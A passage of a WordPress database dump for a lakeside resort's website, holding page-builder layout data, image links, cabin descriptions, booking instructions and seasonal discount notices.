\"id\":25}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"afdc2b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"add9822\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d52633\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0312570\"}]},\"elements\":[{\"id\":\"486571f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3760.jpg\",\"id\":229}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b37b2f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b37fa33\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"471ee7e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bfb7949\"}]},\"elements\":[{\"id\":\"b558c74\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ashleyslide.jpg\",\"id\":276}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18b0ac5\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbb1165\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d993c2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa20e9d\"}]},\"elements\":[{\"id\":\"697d49f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"26d4eda\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0481647\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"956c2b6\"}]},\"elements\":[{\"id\":\"5c8aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC03045.jpg\",\"id\":345}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dda09b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"35f3206\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e2bad3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b974acd\"}]},\"elements\":[{\"id\":\"8febd97\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Walleye11.jpg\",\"id\":310}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ea37e0b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c6f18e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"970e8e0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77ef7f9\"}]},\"elements\":[{\"id\":\"3b9d7e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-124.jpg\",\"id\":293}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53937bf\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4a2285b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aad1dae\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d692266\"}]},\"elements\":[{\"id\":\"d3d299e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a950b78\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"89e608e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3908e23\"}]},\"elements\":[{\"id\":\"5835d70\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-107.jpg\",\"id\":292}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"956ab73\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3dad711\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68406cd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"faf04f5\"}]},\"elements\":[{\"id\":\"c5f71c3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-092.jpg\",\"id\":290}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3be40af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d6d5de8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"00af4c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9404d48\"}]},\"elements\":[{\"id\":\"a342ecc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-106.jpg\",\"id\":291}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d463a54\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"40849f0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dab17ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b4b9305\"}]},\"elements\":[{\"id\":\"f269423\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f0fca1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3f758b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fa32b5d\"}]},\"elements\":[{\"id\":\"72f77c1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A great way to spend a hot sunny day is on our sandy beach. The beach is shallow and has a slide in the water. <br \\/>For those that like to hang out in deeper water there is a floating raft. <br \\/>Pelican Lake is a 4,000 acre lake but is also a shallow lake and warms up quite early making it a great place to swim all summer.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2338,88,'_elementor_template_type','post'),(2339,88,'_elementor_version','2.5.16'),(2341,88,'vantage_panels_no_legacy','true'),(2342,808,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:33:\"See what is available this season\";s:4:\"text\";s:459:\"Book your stay by calling (218) 747-2959. The calendar may not be up to date. you can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:13:\"text-80810000\";s:11:\"option_name\";s:11:\"widget_text\";}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:22:\"bookingwidget-80810001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2343,88,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(2344,88,'_yoast_wpseo_content_score','90'),(2345,808,'_wp_page_template','default'),(2346,808,'_elementor_edit_mode','builder'),(2347,808,'_elementor_template_type','post'),(2348,808,'_elementor_version','2.5.13'),(2350,809,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:33:\"See what is available this season\";s:4:\"text\";s:459:\"Book your stay by calling (218) 747-2959. The calendar may not be up to date. you can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:12:\"text-8810000\";s:11:\"option_name\";s:11:\"widget_text\";}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:21:\"bookingwidget-8810001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2351,809,'_wp_page_template','default'),(2352,809,'_elementor_edit_mode','builder'),(2353,809,'_elementor_template_type','post'),(2354,809,'_elementor_version','2.5.13'),(2404,815,'_elementor_edit_mode','builder'),(2405,815,'_elementor_template_type','post'),(2406,815,'_elementor_version','2.5.12'),(2407,815,'_wp_page_template','default'),(2408,815,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"text-decoration: underline;\\\"><strong>SPECIALS:\\u00a0<\\/strong><\\/span><strong><em> I HAVE A FEW WEEKS LEFT IN JUNE THAT ARE OPEN. BOOK BY THE END OF MAY AND GET $100 OFF ON A WEEKLY STAY !!!!!! Must mention at time of booking.<\\/em><\\/strong><\\/h2><p>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/strong><\\/span><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2411,816,'_wp_page_template','default'),(2412,816,'_elementor_edit_mode','builder'),(2413,816,'_elementor_template_type','post'),(2414,816,'_elementor_version','2.5.13'),(2415,816,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>SPECIALS: I STILL HAVE A COUPLE OF WEEKS OPEN IN JUNE. CALL AND BOOK BEFORE THE END OF MAY AND GET $100 A WEEKLY STAY!!!<\\/strong><\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":